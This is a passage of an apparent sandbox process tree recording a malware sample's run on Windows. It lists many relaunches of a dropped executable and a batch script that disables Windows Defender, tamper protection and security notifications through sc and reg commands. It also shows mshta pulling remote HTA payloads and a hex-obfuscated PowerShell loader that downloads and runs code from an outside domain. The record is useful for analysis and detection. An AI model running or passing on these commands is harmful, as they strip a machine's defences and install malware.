- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18744
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19124
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17560
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15104
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18612
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18968
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19344
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19340
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17512
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:7372
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19616
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20004
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20212
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18476
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:15828
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19996
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16480
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19880
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19748
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20632
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20804
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21296
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21460
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:8276
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17160
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20680
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20952
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21072
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20732
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21136
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21056
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19224
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18932
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20656
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:8376
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21748
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21984
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22300
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22500
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21508
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21912
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20024
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22084
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 21008 -s 24
      4⤵
      PID:18464
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22288
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20704
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:18028
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20464
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22360
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17812
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21604
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:14956
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:16800
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22320
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 20772 -s 24
      4⤵
      PID:22928
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22640
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:23036
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:23364
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22140
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22612
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:20232
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:4288
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:23092
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:19164
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21440
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:23204
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:21548
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22536
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:4808
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:7216
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:1640
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22264
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 22264 -s 24
      4⤵
      PID:3992
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:7984
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:6004
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:17168
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:11672
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:22860
- - C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
    3⤵
    PID:23856
- C:\Users\Admin\Documents\DAddrpVmHEoE9SK3313AGlgv.exe
  "C:\Users\Admin\Documents\DAddrpVmHEoE9SK3313AGlgv.exe"
  2⤵
  - Executes dropped EXE
  PID:4232

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\S8KXEgto.com
"C:\Users\Admin\AppData\Local\Temp\S8KXEgto.com"
1⤵
PID:4124
- C:\Windows\System32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C734.tmp\C735.tmp\C736.bat C:\Users\Admin\AppData\Local\Temp\S8KXEgto.com"
  2⤵
  PID:1112
- - C:\Windows\system32\sc.exe
    sc config Sense start=disabled
    3⤵
    PID:5972
- - C:\Windows\system32\sc.exe
    sc config WdNisDrv start=disabled
    3⤵
    PID:6024
- - C:\Windows\system32\sc.exe
    sc config WdNisSvc start=disabled
    3⤵
    PID:4048
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:6952
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:7156
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    PID:7636
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:6632
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
    3⤵
    PID:7660
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
    3⤵
    PID:7512
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
    3⤵
    PID:5768
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:7240
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    PID:7140
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    PID:6840
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    PID:7056
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    PID:8384
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    PID:8656
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
    3⤵
    PID:8904
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:2152
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:8744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
    3⤵
    PID:3532
  - - C:\Windows\system32\find.exe
      find /i "SecHealthUI"
      4⤵
      PID:9004
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
      4⤵
      PID:2304
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
    3⤵
    PID:8784
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
    3⤵
    PID:9192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
    3⤵
    PID:1240
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
      4⤵
      PID:3244
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
    3⤵
    PID:7188
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
    3⤵
    PID:1252
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
    3⤵
    PID:9356
- - C:\Windows\system32\sc.exe
    sc config SecurityHealthService start=disabled
    3⤵
    PID:5228
- - C:\Windows\system32\sc.exe
    sc config WinDefend start=disabled
    3⤵
    PID:4480

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4368

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5036

C:\Users\Admin\AppData\Roaming\5392668.exe
"C:\Users\Admin\AppData\Roaming\5392668.exe"
1⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\PdZ28YgE.com
"C:\Users\Admin\AppData\Local\Temp\PdZ28YgE.com"
1⤵
PID:4832
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" https://ia601408.us.archive.org/23/items/fix.hta-ert/FIX.hta_ert.txt
  2⤵
  PID:5296

C:\Users\Admin\AppData\Roaming\3239027.exe
"C:\Users\Admin\AppData\Roaming\3239027.exe"
1⤵
PID:4860

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5164

C:\Users\Admin\AppData\Roaming\7706313.exe
"C:\Users\Admin\AppData\Roaming\7706313.exe"
1⤵
PID:5456

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4932

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
1⤵
PID:6008

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4680

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6072

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5856

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4704

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://kmsauto.us/1/FIX.hta
1⤵
PID:2264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://kmsautoXXXus/1/fixXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
  2⤵
  PID:4224
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    PID:15028

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5068

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:6216

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6260

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:7016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7008

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4204

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:1528

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5376

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:7060

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4668

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:7556

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6568

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:7800

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
